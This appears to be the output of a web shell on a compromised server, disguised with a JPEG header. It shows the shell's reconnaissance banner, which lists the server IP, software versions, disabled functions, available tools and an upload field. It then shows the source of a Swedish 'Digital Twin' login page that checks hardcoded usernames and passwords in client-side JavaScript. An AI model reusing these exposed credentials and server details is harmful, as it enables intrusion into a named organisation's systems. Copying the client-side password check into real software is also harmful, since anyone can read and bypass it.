????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.144.226.114 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/digitaltwin/ |
Upload File : |
<!doctype html> <html> <head> <meta charset="UTF-8"> <title>Astaucs Digital Twin Portal</title> <meta name="viewport" content="initial-scale=1,maximum-scale=1,user-scalable=no"> <link href="https://api.mapbox.com/mapbox-gl-js/v2.4.1/mapbox-gl.css" rel="stylesheet"> <script src="https://api.mapbox.com/mapbox-gl-js/v2.4.1/mapbox-gl.js"></script> <style></style> <script> function login(){ if(document.getElementById("email").value == "astacus" && document.getElementById("password").value == "astacus" ){ location.href='start.php'; }else if(document.getElementById("email").value == "higab" && document.getElementById("password").value == "higab" ){ location.href='start2.php'; } }</script> </head> <body leftmargin="0" marginheight="0" topmargin="0"> <table width="100%" border="0" style="position: absolute; top: 0; bottom: 0; left: 0; right: 0; font-family: 'Gill Sans', 'Gill Sans MT', 'Myriad Pro', 'DejaVu Sans Condensed', Helvetica, Arial, sans-serif; color: #FFFFFF;"> <tbody> <tr> <td width="250" rowspan="2" align="left" valign="top" bgcolor="#2F2F2F" ><a href="start.php"><img src="images/astacus_wide_original.png" width="200" style="margin-top: 10px;" alt=""/></a> <hr color="#6B6B6B"> <p> <center> </center> </p> <p> </p> <p></p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p></td> <td width="*" height="45" align="center"> <p><span style="font-size: 36px; color: #000000">Digital Twin - Logga in</span></p></td> </tr> <tr style="height: 25%; font-size: 18px; color: #000000;"> <td align="center" valign="top" bgcolor="#ECECEC"> <br> <br> <br> <br> <br> <table width="365" border="0"> <tbody> <tr> <td width="113">Användarnamn:</td> <td width="242" align="right"><label for="email"></label> <input type="email" name="email" id="email" style="font-size: 18"></td> </tr> <tr> <td>Lösenord:</td> <td align="right"><label for="password"></label> <input type="password" name="password" id="password" style="font-size: 18"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" name="submit" id="submit" value="Logga in" onClick="login();"></td> </tr> <tr> <td> </td> <td align="right"> </td> </tr> </tbody> </table> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p></td> </tr> </tbody> </table> </body> </html>